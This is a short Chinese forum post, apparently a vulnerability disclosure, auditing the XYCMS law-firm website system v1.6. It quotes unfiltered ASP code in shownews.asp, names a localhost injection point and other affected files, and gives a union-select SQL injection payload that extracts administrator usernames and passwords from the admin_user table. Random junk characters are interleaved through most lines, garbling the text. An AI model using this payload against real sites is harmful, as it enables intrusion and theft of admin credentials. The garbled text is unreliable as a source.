前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
4 w9 H: Y$ b& O9 A
9 s1 n8 J$ g7 ]9 e淫荡分割线! X- Q3 O6 o( `% o
--------------------------------------------------------, r: G) y( ^( Q
( j3 K7 {9 s1 m9 j% t
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
6 n& V9 f& K& i- L源码地址:http://down.chinaz.com/soft/29233.htm
& f- A8 C, ] g 2 M% l1 I! L& e
漏洞文件:shownews.asp/ \% F# s& y$ A; f5 j5 j
漏洞代码:7-13行
& P$ {* j9 H9 E& u) d4 W
, R7 Z) h& ^5 p, ?" c$ C
! b3 r* B9 o" a& `; C1 l<% 8 v0 n7 H( v4 n. y
id=request.QueryString("id")+ u8 J7 X* g4 M: L r2 c/ g" q
5 \% I5 {: ^9 t* J% C- f2 mset snews=server.createobject("adodb.recordset") # C3 v$ K9 e- a8 u# H
exec="select * from [news] where id="&id) F* i5 z1 z. i# Y
snews.open exec,conn,1,10 F/ ~8 ~1 v& e1 W/ N) X
%>! P8 }* ]& O1 [& i% {& W
3 m3 Q& q& ^' k. L 0 [# }1 L) k* D/ S: X0 @# v
什么过滤都没有 直造成注入9 e; z# A5 ~5 W- T. e& j
& r) ]9 i/ X4 M) a3 k; L l注入点:http://127.0.0.1:99/shownews.asp?id=xx) K% a0 z1 ~7 u4 l0 ~' v
2 d# ^5 E) C w7 L) H
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找- R+ ?# }9 l, q! Y1 g; j
) k+ i0 M5 E9 i
5 N2 [8 J0 v! o9 j: aexp: union select 1,admin,password,4,5,7 from admin_user7 C" R: g; H0 S# w' _. F/ A
& |. Z, T$ Z; W6 R1 M V
|